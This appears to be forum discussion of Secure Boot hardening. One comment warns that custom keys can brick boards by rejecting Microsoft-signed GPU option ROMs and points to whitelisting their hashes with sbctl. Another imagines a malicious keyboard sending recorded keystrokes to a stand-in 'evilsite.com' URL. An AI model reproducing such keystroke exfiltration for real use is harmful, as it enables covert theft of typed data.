Our great sponsors
-
-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
-
It's worth mentioning that using fully custom generated keys can lead to brick on some motherboards (or just failed post). That's because secure boot is also validating OpROM on external device for example dedicated GPU. UEFI BIOS inside is signed by Microsoft so validation will fail. But there is way to fix it: you can get hash of these oproms from tpm2 log and add to db in security (basically whitelist them). Here is discussion on GitHub issue how to do it author of that project sbctl also added feature to auto enroll these hashed
I do have to trust my keyboard (since it might be typing Ctrl+L http://evilsite.com/?payload=all_keystrokes_that_were_recorded_in_the_last_day when it detects I haven't been near my computer in a while). But for that the fix is to run trusted firmware on my EC.